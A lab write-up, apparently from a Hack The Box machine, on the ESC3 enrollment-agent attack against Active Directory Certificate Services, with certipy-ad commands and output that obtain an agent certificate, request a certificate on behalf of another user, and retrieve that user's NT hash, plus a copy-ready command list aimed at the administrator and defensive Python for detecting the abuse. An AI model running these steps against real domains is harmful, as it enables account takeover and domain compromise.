2. ESC3

1. Introduction

ESC3 exploits a weakness related to certificate request agents (also called enrollment agents).

An Enrollment Agent is an account that is authorized to request certificates on behalf of other users. This capability is legitimate in some scenarios, for example help-desk staff enrolling smart cards for users, or automated certificate provisioning systems.

However, if an attacker obtains a valid enrollment agent certificate, or can use misconfigured template permissions to enroll a new one, they can abuse that privilege to obtain certificates for other users, including highly privileged accounts such as Domain Administrators.

2. Exploitation

2.1. Detection

certipy-ad find -u 'user@domain' -p 'Pass' -dc-ip 'ip' -vulnerable -stdout

# Example: the Delegated-CRA template is reported as vulnerable to ESC3
┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad find -u 'Lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.10.11.71' -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-05T19:52:09+00:00
    Template Last Modified              : 2024-11-05T19:52:10+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFICATE.HTB\Administrator
        Full Control Principals         : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.
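As an added example that is not part of the original write-up: a small Python script that parses the text output of certipy-ad find -stdout (the format shown above) and lists, from a defender's audit perspective, every enabled template that hands out the Certificate Request Agent EKU without a manual gate (manager approval or a required co-signature) to principals outside the privileged groups. The sample input is a trimmed copy of the output above plus a second, constructed template named HardenedAgent; the privileged-group list and the parser's alignment rule (continuation values sit under the value column, as certipy prints them) are assumptions of this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: a trimmed copy of the certipy output shown on this
# page, followed by a hypothetical "HardenedAgent" template that also carries
# the Enrollment Agent EKU but is gated by manager approval and restricted
# to Domain Admins.
SAMPLE_FIND_OUTPUT = r"""Certipy v5.0.2 - by Oliver Lyak (ly4k)

Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Enrollment Agent                    : True
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Template Created                    : 2024-11-05T19:52:09+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.
  1
    Template Name                       : HardenedAgent
    Enabled                             : True
    Enrollment Agent                    : True
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain Admins
"""

Template = Dict[str, List[str]]

# "    Key   : value" (optionally prefixed with "[+] " / "[!] ")
KEY_LINE = re.compile(r"^(\s*)(?:\[[+!*]\]\s+)?([A-Za-z][A-Za-z0-9 ]*?)\s*:\s?(.*)$")
# "  0", "  1", ... start a new template entry
INDEX_LINE = re.compile(r"^\s*\d+\s*$")

# Assumed set of principals for which agent rights are expected (example assumption).
PRIVILEGED_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrator"}


def parse_certipy_find(text: str) -> List[Template]:
    """Parse the 'Certificate Templates' section into one dict per template.
    Every field maps to a list so multi-line fields such as 'Enrollment Rights'
    keep all their entries."""
    templates: List[Template] = []
    current: Optional[Template] = None
    last_key: Optional[str] = None
    value_col = -1
    in_templates = False
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        if indent == 0:
            # Top-level section header ("Certificate Authorities", "Certificate Templates", ...)
            in_templates = line.strip() == "Certificate Templates"
            current = None
            continue
        if not in_templates:
            continue
        if INDEX_LINE.match(line):
            current = {}
            templates.append(current)
            last_key = None
            continue
        if current is None:
            continue
        m = KEY_LINE.match(line)
        if m:
            last_key = m.group(2).strip()
            value = m.group(3).strip()
            current[last_key] = [value] if value else []
            value_col = m.start(3)  # column where values are aligned
        elif last_key is not None and indent >= value_col:
            # Continuation line of a multi-valued field, aligned under the value column.
            current[last_key].append(line.strip())
        # Anything else ("Permissions", "[!] Vulnerabilities", ...) is a sub-heading.
    return templates


def esc3_findings(templates: List[Template],
                  privileged=PRIVILEGED_PRINCIPALS) -> List[Tuple[str, List[str]]]:
    """Return (template name, low-privilege enrollers) for every enabled template
    that issues the Certificate Request Agent EKU without a manual gate."""
    findings = []
    for t in templates:
        name = t.get("Template Name", ["?"])[0]
        if t.get("Enabled", ["False"])[0] != "True":
            continue
        if t.get("Enrollment Agent", ["False"])[0] != "True":
            continue
        # Manager approval or a required co-signature means a human must sign off.
        if t.get("Requires Manager Approval", ["False"])[0] == "True":
            continue
        if t.get("Authorized Signatures Required", ["0"])[0] != "0":
            continue
        enrollers = t.get("Enrollment Rights", [])
        low_priv = [p for p in enrollers if p.split("\\", 1)[-1] not in privileged]
        if low_priv:
            findings.append((name, low_priv))
    return findings


if __name__ == "__main__":
    for name, who in esc3_findings(parse_certipy_find(SAMPLE_FIND_OUTPUT)):
        print(f"[!] {name}: agent EKU enrollable by {', '.join(who)}")
```

On the sample, only Delegated-CRA is reported (enrollable by Domain CRA Managers); HardenedAgent is skipped because of the manager-approval gate. In practice the same parser can be pointed at the full output of a find run without -vulnerable, which lists every template rather than only the ones certipy already flags.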

2.2. Privilege escalation

Assume the Delegated-CRA template has been found to be vulnerable to ESC3.

2.2.1. Step 1: obtain an enrollment agent certificate

The attacker (attacker@corp.local) requests a certificate from a misconfigured Enrollment Agent template (or from a template with the ESC2 "Any Purpose" weakness).

  • Here the misconfigured template is the ESC3-vulnerable Delegated-CRA template

┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad req -u 'Lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.10.11.71' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saving certificate and private key to 'lion.sk.pfx'
[*] Wrote certificate and private key to 'lion.sk.pfx'

Running this writes a .pfx file (here lion.sk.pfx) containing the agent certificate and its private key.

2.2.2. Step 2: use the enrollment agent certificate to request a certificate on behalf of the target user

Use attacker.pfx (the enrollment agent certificate obtained in step 1) to request a certificate on behalf of the CORP\Administrator user from the User template (or another suitable target template that the agent is allowed to enroll in). In the run below the agent certificate is lion.sk.pfx, the target template is SignedUser and the target user is certificate\ryan.k.

┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad req -u 'Lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.10.11.71' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'certificate\ryan.k'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 26
[*] Successfully requested certificate
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saving certificate and private key to 'ryan.k.pfx'
[*] Wrote certificate and private key to 'ryan.k.pfx'

2.2.3. Step 3: authenticate with the certificate and retrieve the hash

The clock is synced with the DC first (ntpdate), because Kerberos rejects requests whose timestamp is too far from the KDC's clock.

┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# ntpdate 10.10.11.71
2025-06-24 15:47:39.722106 (-0400) +27460.073931 +/- 0.036741 10.10.11.71 s1 no-leap
CLOCK: time stepped by 27460.073931

┌──(root㉿kali)-[~/…/htb/season8/certificate/Krb5RoastParser]
└─# certipy-ad auth -pfx 'ryan.k.pfx' -dc-ip '10.10.11.71' 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'ryan.k@certificate.htb'
[*]     Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Using principal: 'ryan.k@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6
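Also added here, not part of the original write-up: a Python sketch of how a defender could spot the chain in steps 1 to 3 from CA and domain controller logs. A certificate the CA issues on behalf of another user shows up in Event ID 4887 with a Requester that differs from the account named in the Subject, and the later certificate-based logon shows up in Event ID 4768 carrying certificate information (PKINIT, pre-authentication type 16). The event records below are constructed and simplified (the flat key-value shape and field names are assumptions of this example, not a real export format), the thumbprint is a placeholder, and the one-hour correlation window is arbitrary.

```python
from datetime import datetime, timedelta
from typing import Dict, List

Event = Dict[str, str]

# Constructed, simplified event records (not a real Windows export format).
# 4887 = "Certificate Services approved a certificate request and issued a certificate" (CA)
# 4768 = "A Kerberos authentication ticket (TGT) was requested" (DC)
SAMPLE_EVENTS: List[Event] = [
    # Step 1 as seen by the CA: the agent enrols for itself from the agent template.
    {"EventID": "4887", "Time": "2025-06-24T15:40:01Z", "RequestID": "21",
     "Requester": "CERTIFICATE\\Lion.SK",
     "Subject": "CN=Lion.SK,OU=Users,DC=certificate,DC=htb",
     "Attributes": "CertificateTemplate:Delegated-CRA"},
    # Step 2 as seen by the CA: requester and subject are different accounts.
    {"EventID": "4887", "Time": "2025-06-24T15:42:10Z", "RequestID": "26",
     "Requester": "CERTIFICATE\\Lion.SK",
     "Subject": "CN=ryan.k,OU=Users,DC=certificate,DC=htb",
     "Attributes": "CertificateTemplate:SignedUser"},
    # Benign self-enrolment by an unrelated user.
    {"EventID": "4887", "Time": "2025-06-24T15:43:00Z", "RequestID": "27",
     "Requester": "CERTIFICATE\\alice",
     "Subject": "CN=alice,OU=Users,DC=certificate,DC=htb",
     "Attributes": "CertificateTemplate:User"},
    # Step 3 as seen by the DC: TGT requested with a certificate (PKINIT) for ryan.k.
    {"EventID": "4768", "Time": "2025-06-24T15:47:45Z", "TargetUserName": "ryan.k",
     "PreAuthType": "16", "CertThumbprint": "PLACEHOLDER-THUMBPRINT"},
    # Benign password-based TGT request (no certificate information).
    {"EventID": "4768", "Time": "2025-06-24T15:48:00Z", "TargetUserName": "alice",
     "PreAuthType": "2", "CertThumbprint": ""},
]


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def subject_account(subject_dn: str) -> str:
    """Return the CN of a subject DN, e.g. 'CN=ryan.k,OU=Users,...' -> 'ryan.k'."""
    for part in subject_dn.split(","):
        key, _, val = part.strip().partition("=")
        if key.upper() == "CN":
            return val
    return subject_dn


def requester_account(requester: str) -> str:
    """Strip the domain prefix from 'DOMAIN\\user'."""
    return requester.rsplit("\\", 1)[-1]


def template_of(event: Event) -> str:
    """Pull the template name out of the request attributes, if present."""
    for attr in event.get("Attributes", "").split():
        key, _, val = attr.partition(":")
        if key == "CertificateTemplate":
            return val
    return ""


def on_behalf_of_issuances(events: List[Event]) -> List[Event]:
    """4887 events whose requesting account is not the account named in the subject:
    the footprint of an enrollment-agent (on-behalf-of) request."""
    return [e for e in events if e.get("EventID") == "4887"
            and requester_account(e["Requester"]).lower()
            != subject_account(e["Subject"]).lower()]


def pkinit_logons(events: List[Event]) -> List[Event]:
    """4768 events that carry certificate information, i.e. certificate-based logons."""
    return [e for e in events if e.get("EventID") == "4768" and e.get("CertThumbprint")]


def correlate(events: List[Event],
              window: timedelta = timedelta(hours=1)) -> List[Dict[str, str]]:
    """Pair each on-behalf-of issuance with a certificate logon of the same account
    inside the window; each pair is one alert worth a human look."""
    alerts = []
    logons = pkinit_logons(events)
    for issued in on_behalf_of_issuances(events):
        target = subject_account(issued["Subject"]).lower()
        issued_at = parse_time(issued["Time"])
        for logon in logons:
            logon_at = parse_time(logon["Time"])
            if (logon["TargetUserName"].lower() == target
                    and issued_at <= logon_at <= issued_at + window):
                alerts.append({
                    "target": target,
                    "agent": requester_account(issued["Requester"]),
                    "request_id": issued["RequestID"],
                    "template": template_of(issued),
                    "issued_at": issued["Time"],
                    "logon_at": logon["Time"],
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"[!] {alert['agent']} obtained a {alert['template']} certificate for "
              f"{alert['target']} (request {alert['request_id']}); "
              f"certificate logon followed at {alert['logon_at']}")
```

On the sample this yields one alert: Lion.SK obtained a SignedUser certificate for ryan.k (request 26), followed by a certificate logon as ryan.k. The self-enrolment in request 21 is not an alert on its own, but a 4887 for a template whose EKU is Certificate Request Agent is worth its own watch-list rule, since legitimate agent enrolments should be rare and tied to known help-desk or provisioning accounts.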

2.3. Quick exploitation commands

# Step 1: request the enrollment agent certificate from the ESC3-vulnerable template
certipy-ad req -u 'user' -p 'pass' -dc-ip 'ip' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template '<ESC3-vulnerable template>'

# Step 2: request a certificate on behalf of the target user with the .pfx written by step 1 (lion.sk.pfx in the run above)
certipy-ad req -u 'user' -p 'pass' -dc-ip 'ip' -target 'certificate.htb' -ca 'Certificate-LTD-CA' -template 'User' -pfx 'lion.sk.pfx' -on-behalf-of 'certificate\administrator'

# Step 3: sync the clock with the DC, then authenticate with the target user's certificate
ntpdate 10.10.11.71
certipy-ad auth -pfx 'administrator.pfx' -dc-ip 'ip'